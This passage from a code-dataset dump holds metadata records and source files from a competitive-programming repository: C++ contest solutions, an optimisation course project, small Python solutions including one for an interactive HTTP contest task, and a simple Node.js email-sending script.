edges[u].pb(v);\n edges[v].pb(u);\n}\n\ngraph::graph(){};\n\nvoid graph::createGraph(int n)\n{\n edges.resize(n);\n}\n\nvoid graph::writeln()\n{\n fori(n)\n forj(edges[i].size())\n ::writeln(i, edges[i][j]);\n}\n\nvoid graph::writelnMatrix()\n{\n fori(n)\n {\n forj(n)\n printf(\"%d \", edges[i][j]);\n printf(\"\\n\");\n }\n}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n readln(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid writeln(int a)\n{\n printf(\"%d\\n\", a);\n}\n\nvoid writeln(int a, int b)\n{\n printf(\"%d %d\\n\", a, b);\n}\n\nvoid writeln(int a, int b, int c)\n{\n printf(\"%d %d %d\\n\", a, b, c);\n}\n\nvoid writeln(int a, int b, int c, int d)\n{\n printf(\"%d %d %d %d\\n\", a, b, c, d);\n}\n\nvoid readln(int &a)\n{\n scanf(\"%d\", &a);\n}\n\nvoid readln(int &a, int &b)\n{\n scanf(\"%d %d\", &a, &b);\n}\n\nvoid readln(int &a, int &b, int &c)\n{\n scanf(\"%d %d %d\", &a, &b, &c);\n}\n\nvoid readln(int &a, int &b, int &c, int &d)\n{\n scanf(\"%d %d %d %d\", &a, &b, &c, &d);\n}\n" }, { "alpha_fraction": 0.3859747648239136, "alphanum_fraction": 0.4238429069519043, "avg_line_length": 31.67889976501465, "blob_id": "24f5b6ebd4b05f2b7a381d6ac7472c0e7de64f77", "content_id": "a830a1586dd08c387c86440f8307f5468cfd60d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3565, "license_type": "no_license", "max_line_length": 144, "num_lines": 109, "path": "/2021/yandexBackendQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\n\na = []\nfor i in range(4):\n a.append(input())\n\ndef get(names):\n return requests.request('MEW', 'http://127.0.0.1:7777/', headers={'X-Cat-Variable': ','.join(names)}).headers.get('X-Cat-Value').split(', ')\n\nvalues = []\n\nthree = get(a[:-1])\ns = set(three)\nif len(s) == 1: #000\n fourth = get([a[3]])[0]\n values = [three[0], three[1], three[2], fourth]\nelif len(s) == 3:#012\n zero, one, two = three\n ad = get([a[0], a[3]])\n if ad[0] == ad[1]:\n if ad[0] == zero:\n if get([a[1]])[0] == one:\n values = [zero, one, two, zero]\n else:\n values = [zero, two, one, zero]\n elif ad[0] == one:\n if get([a[1]])[0] == zero:\n values = [one, zero, two, one]\n else:\n values = [one, two, zero, one]\n else:\n if get([a[1]])[0] == one:\n values = [two, one, zero, two]\n else:\n values = [two, zero, one, two]\n elif ad[0] == zero and ad[1] == one:\n cd = get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == zero:\n values = [one, two, zero, zero]\n elif cd[0] == cd[1] and cd[0] == one:\n values = [zero, two, one, one]\n elif cd[0] == one:\n values = [zero, one, two, one]\n else:\n values = [one, zero, two, zero]\n elif ad[0] == zero and ad[1] == two:\n cd = get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == zero:\n values = [two, one, zero, zero]\n elif cd[0] == cd[1] and cd[0] == two:\n values = [zero, one, two, two]\n elif cd[0] == zero:\n values = [two, zero, one, zero]\n else:\n values = [zero, two, one, two]\n elif ad[0] == one and ad[1] == two:\n cd = get([a[2], a[3]])\n if cd[0] == cd[1] and cd[0] == one:\n values = [two, zero, one, one]\n elif cd[0] == cd[1] and cd[0] == two:\n values = [one, zero, two, two]\n elif cd[1] == one:\n values = [two, one, zero, one]\n else:\n values = [one, two, zero, two]\n else:\n first = ad[0] if ad[0] in s else ad[1]\n forth = ad[1] if ad[0] in s else ad[0]\n s.remove(first)\n second = get([a[1]])[0]\n s.remove(second)\n third = s.pop()\n values = [first, second, third, forth]\n\n\nelse:#001\n zero = three[1]\n one = three[2] if three[0] == three[1] else three[0]\n tf = get([a[2], a[3]])\n if tf[0] == tf[1]:#001 + ??yy\n if tf[0] == zero:#??00\n if get([a[0]])[0] == one:#1000\n values = [one, zero, zero, zero]\n else:#0100\n values = [zero, one, zero, zero]\n else:#0011\n values = [zero, zero, one, one]\n else:\n if set(tf) == s:#??01\n ad = get([a[0], a[3]])\n if ad[0] == ad[1] and ad[0] == zero:\n values = [zero, zero, one, zero]\n elif ad[0] == ad[1] and ad[1] == one:\n values = [one, zero, zero, one]\n else:\n values = [zero, one, zero, one]\n else:#??(0/1)2\n third = tf[0] if tf[0] in s else tf[1]\n forth = tf[1] if tf[0] in s else tf[0]\n if third == one:#??12\n values = [zero, zero, third, forth]\n else:#??02\n if get([a[0]])[0] == zero:\n values = [zero, one, zero, forth]\n else:\n values = [one, zero, zero, forth]\n\n\nprint(*values, sep='\\n')\n\n\n\n" }, { "alpha_fraction": 0.3158508241176605, "alphanum_fraction": 0.3426573574542999, "avg_line_length": 22.83333396911621, "blob_id": "e750962dfade8655edeb7504ff6f1eebdf8971ba", "content_id": "46f7c3a966d1fd6fa47121a13885ce0f756c38f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 858, "license_type": "no_license", "max_line_length": 50, "num_lines": 36, "path": "/TopCoder/TC655/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n#define INF 1000000007\n\nusing namespace std;\n\nclass FoldingPaper2 \n{\npublic:\n int solve(int w, int h, int A) \n {\n auto f = [](int i, int j, int w, int h){\n int ans = 0;\n if (w < i || h < j)\n return INF;\n while (i * 2 <= w)\n w = (w + 1) / 2,\n ans++;\n while (j * 2 <= h)\n h = (h + 1) / 2,\n ans++;\n if (i < w)\n ans++;\n if (j < h)\n ans++;\n return ans;\n };\n int ans = INF;\n fori(A + 1)\n if (i && (A % i == 0))\n ans = min(ans, f(A / i, i, w, h));\n return ans == INF ? -1 : ans;\n }\n};\n" }, { "alpha_fraction": 0.42680180072784424, "alphanum_fraction": 0.44003379344940186, "avg_line_length": 30.714284896850586, "blob_id": "a84f9a16e6749d55d377adc9bedfec20fa2e3b45", "content_id": "6cbbdef5040f52a30d4e2db3e379d5b727ba7ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3552, "license_type": "no_license", "max_line_length": 928, "num_lines": 112, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.17/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define ll long long\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> d;\nvector< vector< pair<int, int> > > edges;\nint a[101][101];\nint n;\nstring FILENAME = \"honeymoon\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint dijkstra()\n{\n priority_queue< pair<int, int> > q;\n q.push(make_pair(0, 0));\n d.clear();\n d.resize(n * n, INF);\n d[0] = 0;\n int u, curd, v, w;\n while (!q.empty())\n {\n u = q.top().second;\n curd = -q.top().first;\n q.pop();\n if (curd > d[u])\n continue;\n for (int i = 0; i < edges[u].size(); i++)\n {\n v = edges[u][i].first;\n w = edges[u][i].second;\n if (u == v)\n continue;\n if (d[v] > d[u] + w)\n {\n d[v] = d[u] + w;\n q.push(make_pair(-d[v], v));\n }\n }\n }\n return d[n * n - 1];\n}\n\nvoid run()\n{\n readln(n);\n int x;\n edges.clear();\n edges.resize(n * n);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < n; j++)\n read(a[i][j]);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < n; j++)\n {\n if (i > 0)\n edges[n * i + j].pb(make_pair(n * (i - 1) + j, a[i][j] - a[i - 1][j]));\n if (j > 0)\n edges[n * i + j].pb(make_pair(n * i + j - 1, a[i][j] - a[i][j - 1]));\n if (i < n - 1)\n edges[n * i + j].pb(make_pair(n * (i + 1) + j, a[i][j] - a[i + 1][j]));\n if (j < n - 1)\n edges[n * i + j].pb(make_pair(n * i + j + 1, a[i][j] - a[i][j + 1]));\n }\n printf(\"%d\", dijkstra());\n// for (int i = 0; i < n * n; i++)\n // for (int j = 0; j < edges[i].size(); j++)\n // printf(\"%d %d %d\\n\", i, edges[i][j].first, edges[i][j].second);\n writeln(d);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n int T;\n readln(T);\n for (int TT = 0; TT < T; TT++)\n {\n printf(\"Scenario #%d:\\n\", TT + 1);\n run();\n if (TT < T - 1)\n printf(\"\\n\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.49733901023864746, "alphanum_fraction": 0.5156998634338379, "avg_line_length": 30.579832077026367, "blob_id": "1c573c2cb257472e30052051887b2d67a75ff685", "content_id": "0baa976acbc04dec8de5640759858119eb304be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3758, "license_type": "no_license", "max_line_length": 174, "num_lines": 119, "path": "/2021/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nint ask(int x, int y, int z)\n{\n writeln(x + 1, y + 1, z + 1);\n cout.flush();\n ints(ans);\n return ans - 1;\n}\n\nvoid run(int n)\n{\n vector<int> a(n);\n iota(all(a), 0);\n random_shuffle(all(a));\n function<vector<int>(int, vector<int>&, int)> f = [&](int l, vector<int>& a, int r) -> vector<int> {\n int m = SZ(a);\n if (m <= 1) return a;\n\n int x = a[0];\n int y = a[1];\n vector<int> left, middle, right;\n for (int i = 2; i < m; ++i)\n {\n int mid = ask(x, y, a[i]);\n if (mid == a[i])\n middle.pb(a[i]);\n else if (mid == x)\n left.pb(a[i]);\n else\n right.pb(a[i]);\n }\n \n if (l != -1)\n {\n int temp = ask(l, x, y);\n if (temp == y)\n swap(x, y),\n swap(left, right);\n } else if (r != -1)\n {\n int temp = ask(r, x, y);\n if (temp == x)\n swap(x, y),\n swap(left, right);\n }\n \n vector<int> L = f(l, left, x);\n vector<int> M = f(x, middle, y);\n vector<int> R = f(y, right, r);\n vector<int> b;\n for (int& z: L) b.pb(z);\n b.pb(x);\n for (int& z: M) b.pb(z);\n b.pb(y);\n for (int& z: R) b.pb(z);\n return b;\n };\n vector<int> temp = f(-1, a, -1);\n for (int& z: temp) ++z;\n writeln(temp);\n cout.flush();\n ints(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t, n, q);\n fori(t) run(n);\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40654826164245605, "alphanum_fraction": 0.466728538274765, "avg_line_length": 28.700786590576172, "blob_id": "48b9fc54f32d4aac656f062dcda97928700339e8", "content_id": "b7a36001e39ae1c674fcce1ea9a437a4beb5def2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7544, "license_type": "no_license", "max_line_length": 139, "num_lines": 254, "path": "/Ann/Kursach.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n#define MAXN 5\n\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.0001;\nstatic const double delta = 0.00001;\nstatic const double l = 0.;\nstatic const double x10 = 0., x20 = 0.;\n\nlong long cnk[MAXN][MAXN];\n\nvoid build_cnk()\n{\n for (int i = 0; i < MAXN; i++)\n cnk[i][0] = 1ll;\n for (int i = 1; i < MAXN; i++)\n for (int j = 1; j < MAXN; j++)\n cnk[i][j] = cnk[i - 1][j] + cnk[i - 1][j - 1];\n}\n\nauto d2f(std::function<double(double, double)> f) -> decltype(f)\n{\n return [f](double x, double y)\n {\n double ans = f(x + delta, y) - f(x, y);\n double t = ans;\n int sign = -1;\n for (int i = 1; i <= MAXN; i++, sign *= -1)\n {\n double tcur = 0;\n for (int j = 0, s = 1; j <= i; j++, s *= -1)\n tcur += s * cnk[i][j] * f(x + delta * (i - j + 1), y);\n t = tcur - t;\n ans += sign * t / (i + 1);\n }\n return ans / delta;\n };\n}\n\nauto df(std::function<double(double)> f) -> decltype(f)\n{\n return bind(d2f([f](double x, double y){return f(x);}), _1, 0);\n}\n\ndouble f(double x1, double x2)\n{\n\n return ((x2 - x1 * x1) * (x2 - x1 * x1) * 100 + (x1 - 1) * (x1 - 1) * 5) / 400;\n}\n\ndouble minimize(std::function<double(double)> f) //Newton method for minimization of one-dimensional function\n{\n\n for (double x = -df(f)(0) / df(df(f))(0); ; x -= df(f)(x) / df(df(f))(x))\n if (fabs(df(f)(x)) <= eps)\n return x;\n}\n\n\ndouble fx1(double x1, double x2)\n{\n return df(bind(f, _1, x2))(x1);\n\n}\n\ndouble fx2(double x1, double x2)\n{\n\n return df(bind(f, x1, _1))(x2);\n\n}\n\nbool check(double x1, double x2)\n{\n\n cout << x1 << \" \" << x2 << \"\\n\";\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> gradientDownFragmentation()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t, f1, f2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n x11 = x1 - alpha * f1;\n x21 = x2 - alpha * f2;\n if (f(x11, x21) > t - eps * alpha * (f1 * f1 + f2 * f2))\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fun = [&x1, &x2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = minimize(fun);\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 = f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = minimize(fun);\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = minimize(fun);\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = minimize(fun);\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = minimize(fun);\n\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n a=1;b=0;c=0;d=1;\n alpha = minimize(fun);\n }\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2);\n s = (p1 * p1 * a + p1 * p2 * b) * alpha / u;\n v = (p1 * p1 * c + p1 * p2 * d) * alpha / u;\n h = (p1 * p2 * a + p2 * p2 * b) * alpha / u;\n g = (p1 * p2 * c + p2 * p2 * d) * alpha / u;\n a = a - e + s;\n b = b - r + v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> newton()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n double q11, q12, q22;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n q11 = df(df(bind(f, _1, x2)))(x1);\n q12 = df(bind(d2f(f), x1, _1))(x2);\n q22 = df(df(bind(f, x1, _1)))(x2);\n x1 = x1 - (f1 * q22 - f2 * q12) / (q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * q11) / (q11 * q22 - q12 * q12);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(10);\n build_cnk();\n freopen(\"output.txt\", \"w\", stdout);\n cout << \"gradient down with fragmentation:\\n\" << (temp = gradientDownFragmentation()).first << \" \";cout << temp.second << endl << endl;\n cout << \"fastest gradient down:\\n\" << (temp = fastestGradientDown()).first << \" \";cout << temp.second << endl << endl;\n// cout << \"sopr direction(Fletchera-Rivsa):\\n\" << (temp = soprDirection()).first << \" \";cout << temp.second << endl << endl;\n// cout << \"newton:\\n\" << (temp = newton()).first << \" \" << temp.second << endl << endl;\n// cout << \"gradient p poryadka:\\n\" << (temp = Gradppor()).first << \" \";cout << temp.second << endl << endl;\n fclose(stdout);\n system(\"javac *.java\");\n system(\"java MainFrame &\");\n return 0;\n}\n" }, { "alpha_fraction": 0.46524062752723694, "alphanum_fraction": 0.48128342628479004, "avg_line_length": 14.5, "blob_id": "98ebc0109fc87864556bad67f84a8e547d7bc9dc", "content_id": "8f281f3f827c20eaaeb2d875f47d261c7f7e5861", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/CodeForce/0952/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nn = int(input())\na = list(map(int, input().split()))\nok = True\n\nfor i in range(n - 1):\n if abs(a[i] - a[i + 1]) > 1:\n ok = False\n\nif ok:\n print('YES')\nelse:\n print('NO')\n" }, { "alpha_fraction": 0.5644268989562988, "alphanum_fraction": 0.5707510113716125, "avg_line_length": 23.326923370361328, "blob_id": "9e51e29e744ff1340d9d684a4c585a4fdeeb4670", "content_id": "82c4cefe80c68a6e1f612f81f70c42a50a0c34c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1265, "license_type": "no_license", "max_line_length": 84, "num_lines": 52, "path": "/scripts/mailSender/index.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "const nodemailer = require('nodemailer');\nconst smtpTransport = require('nodemailer-smtp-transport');\nconst config = require('./config.json');\nconst transporter = nodemailer.createTransport(smtpTransport(config.emailSettings));\nconst process = require('process');\nconst args = process.argv.slice(2);\n\n//Config contains:\n//{\n //\"emailSettings\": {\n //\"domains\": [\n //\"yandex.ru\"\n //],\n //\"host\": \"smtp.yandex.ru\",\n //\"secureConnection\": true,\n //\"port\": 465,\n //\"auth\": {\n //\"user\": \"[email protected]\",\n //\"pass\": \"pAsSwOrD\"\n //}\n //}\n//} \n\nlet sendEmail = async (to, header, html) => {\n console.log(`Sending mail to ${to}:\\n${header}`);\n if (!to)\n return;\n\n let mailOptions = {\n from: '\"Зайка Познайка\" <[email protected]>',\n to: to,\n subject: header,\n html: html\n };\n\n await transporter.sendMail(mailOptions, (error, info) => {\n if (error) {\n console.error(error);\n } else\n console.log(info);\n });\n console.log(`email to ${to} is successfully sent`);\n}\n\nif (args.length < 2)\n console.error('Not enough arguments\\nUsage: node index.js [email protected] theme text');\nelse\n sendEmail(args[0], args[1], args[2] || '');\n\nmodule.exports = {\n sendEmail: sendEmail\n};\n" }, { "alpha_fraction": 0.3685567080974579, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 21.171428680419922, "blob_id": "8ed2c9ecf6a6519217a1789e8a4598859864c7b1", "content_id": "489aa2d6f5ddfc93594b99931803f2804327f36a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 71, "num_lines": 70, "path": "/2015/Ya1/Bcor.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cmath>\n#include <algorithm>\n\nusing namespace std;\n\nstruct Point {\n int x, y, a;\n\n Point() {}\n \n Point(int _x, int _y): x(_x), y(_y), a(-1) {}\n\n Point operator-(const Point &p) const {\n return Point(x - p.x, y - p.y);\n }\n};\n\nconst int MAXN = 1005;\nPoint p[MAXN], q[2 * MAXN];\n\nint cp(const Point &a, const Point &b) {\n return a.x * b.y - a.y * b.x;\n}\n\nbool operator<(const Point &a, const Point &b) {\n if(a.x < 0 || (a.x == 0 && a.y < 0)) {\n if(b.x < 0 || (b.x == 0 && b.y < 0))\n return cp(a, b) > 0;\n return true;\n }\n if(b.x < 0 || (b.x == 0 && b.y < 0))\n return false;\n return cp(a, b) > 0;\n}\n\nbool cmp(const Point &a, const Point &b) {\n return a - q[0] < b - q[0];\n}\n\nint main() {\n ios_base::sync_with_stdio(false);\n int n;\n cin >> n;\n int sum = 0;\n for(int i = 0; i < n; i++) {\n cin >> p[i].x >> p[i].y >> p[i].a;\n sum += p[i].a;\n }\n int ans = sum;\n for(int i = 0; i < n; i++) {\n for(int j = 0; j < n; j++)\n q[j] = p[j];\n swap(q[i], q[0]);\n sort(q + 1, q + n, cmp);\n for(int j = 1; j < n; j++)\n q[n - 1 + j] = q[j];\n int cur = 0;\n for(int j = 1, k = 1; j < n; j++) {\n while(k < j + n - 1 && cp(q[j] - q[0], q[k] - q[0]) >= 0) {\n cur += q[k].a;\n k++;\n }\n ans = min(ans, int(abs(sum - 2 * cur)));\n cur -= q[j].a;\n }\n }\n cout << ans << '\\n';\n return 0;\n}\n" }, { "alpha_fraction": 0.37037035822868347, "alphanum_fraction": 0.39961013197898865, "avg_line_length": 17.321428298950195, "blob_id": "b8ff8efada6b7a13827a7d010808cdfeaf88a601", "content_id": "55bbbcecbcbb280fca53994b454c8a28564f7e47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 513, "license_type": "no_license", "max_line_length": 50, "num_lines": 28, "path": "/TopCoder/2017-TCO-Algorithm/350/ParenthesisRemoval.cc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\n\nclass ParenthesisRemoval \n{\npublic:\n int MOD = 1000000007;\n int countWays(string s) \n {\n int n = s.size();\n int ans = 1;\n int b = 0;\n fori(n)\n {\n if (s[i] == '(')\n b++;\n else\n ans = (ans * 1ll * b) % MOD,\n --b;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5268212556838989, "alphanum_fraction": 0.5425158143043518, "avg_line_length": 33.70731735229492, "blob_id": "9623fc9f985d7a87a07632861b6710c0d390041f", "content_id": "3729e3875373d4b286de9012d47dc061cf564543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 162, "num_lines": 123, "path": "/CodeForce/1209/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma GCC optimize(\"Ofast\")\n#pragma GCC target(\"avx,avx2,fma\")\n#pragma GCC optimize(\"unroll-loops\")\n// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; 